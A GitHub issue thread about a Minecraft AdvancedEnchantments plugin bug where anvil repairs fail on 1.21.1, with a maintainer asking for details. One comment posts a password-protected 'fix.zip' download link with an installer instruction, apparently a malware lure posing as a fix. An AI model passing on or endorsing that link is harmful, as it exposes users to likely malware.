### ISSUE TITLE
Anvil doesn't work

### ISSUE THREAD

**Issue by xProMDFKx** [GC-spigot/AdvancedEnchantments#4593]
### Describe the bug

Basically, anything you would try to combine in anvil, it just doesnt work

### How to reproduce

1. Use minecraft 1.21.1
2. Install latest AE plugin version
3. Try to combine/repair any broken item

### Screenshots / Videos

https://cdn.discordapp.com/attachments/1263623347695255662/1277588430242447391/2024-08-26_14-20-04.mkv?ex=66cdb672&is=66cc64f2&hm=2a5f94b20e2d71bd349e20deadcab605016d952bee3cf15e2bbedb487a06f4aa&

### "/ae plinfo" link

https://paste.md-5.net/miyedateno

### Server Log

https://mclo.gs/YrRaQf4

**Comment by xProMDFKx** [comment]
Sorry, apparently you can enchant items, but you can't repair items

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThomasWega** [comment]
Works completely fine?
![image](https://github.com/user-attachments/assets/f268eb7a-5c11-473b-b14a-81af74d9ac1c)

**Comment by ThomasWega** [comment]
discord link is expired. Upload somewhere else

**Comment by xProMDFKx** [comment]
> Works completely fine? ![image](https://private-user-images.githubusercontent.com/82312488/362237046-a39794ea-690b-41eb-a205-b4d3c79ed651.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4Njg0ODcsIm5iZiI6MTcyNDg2ODE4NywicGF0aCI6Ii84MjMxMjQ4OC8zNjIyMzcwNDYtYTM5Nzk0ZWEtNjkwYi00MWViLWEyMDUtYjRkM2M3OWVkNjUxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDE4MDMwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTZkYzUwODM5YmFmNTIyYjVmMWNlZTMzODU1NmRkNjczMWM4YzRhZmUxYjA3NGE0ZGMyYTU4Y2E4NWNlYjBlZTUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.gMgUtdG6W2-PhnCG75BZC_PJaOATM22lOrurRo3m430)

Try to repair a elytra with phantom membrane

**Comment by xProMDFKx** [comment]
so?

**Comment by xProMDFKx** [comment]
Any updates?

**Comment by ThomasWega** [comment]
<img width="357" alt="image" src="https://github.com/user-attachments/assets/92114d91-82ca-482a-845b-4738bbe2ac4b">
